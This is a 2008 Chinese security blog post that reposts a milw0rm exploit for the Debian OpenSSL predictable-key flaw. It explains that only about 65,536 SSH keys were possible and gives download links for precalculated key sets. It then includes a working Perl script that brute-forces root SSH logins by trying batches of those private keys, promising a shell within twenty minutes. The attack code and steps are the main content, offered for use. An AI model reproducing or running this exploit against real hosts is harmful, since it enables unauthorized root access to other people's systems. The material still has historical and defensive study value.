飘零的代码 piao2010 ’s blog

the debian openssl issue leads that there are only 65.536 possible ssh keys generated, cause the only entropy is the pid of the process generating the key.This leads to that the following perl script can be used with the precalculated ssh keys to brute force the ssh login. It works if such a keys is installed on a non-patched debian or any other system manual configured to.On an unpatched system, which doesn't need to be debian, do the following:keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2     http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz22. Extract it to a directory3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 Bits, generated on an upatched debian (this is the key this exploit will break)4. Run the perl script and give it the location to where you extracted the bzip2 mentioned.#!/usr/bin/perlmy $keysPerConnect = 6;unless ($ARGV[1]) {   print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\\n";   print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\\n";   print "By mm@deadbeef.de\\n";   exit 0;}chdir($ARGV[0]);opendir(A, $ARGV[0]) || die("opendir");while ($_ = readdir(A)) {   chomp;   next unless m,^\\d+$,;   push(@a, $_);   if (scalar(@a) > $keysPerConnect) {      system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);      @a = ();   }}5. Enjoy the shell after some minutes (less than 20 minutes)Regards,Markus Muellermm@deadbeef.de# milw0rm.com [2008-05-15]

相关日志

• 利用SSH Tunnel(隧道)作安全代理 (0)
• 高级PHP应用程序漏洞审核技术 (0)
• 邪恶的空格-PHP本地文件包含漏洞的新突破口! (0)
• 运用sslstrip进行中间人攻击(Bypass https) (5)
• 谈谈自己对木马免杀认识(原创) (0)

Tags: security, ssh

This entry was posted on 星期日, 5月 18th, 2008 at 17:44 and is filed under 搬家之前. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.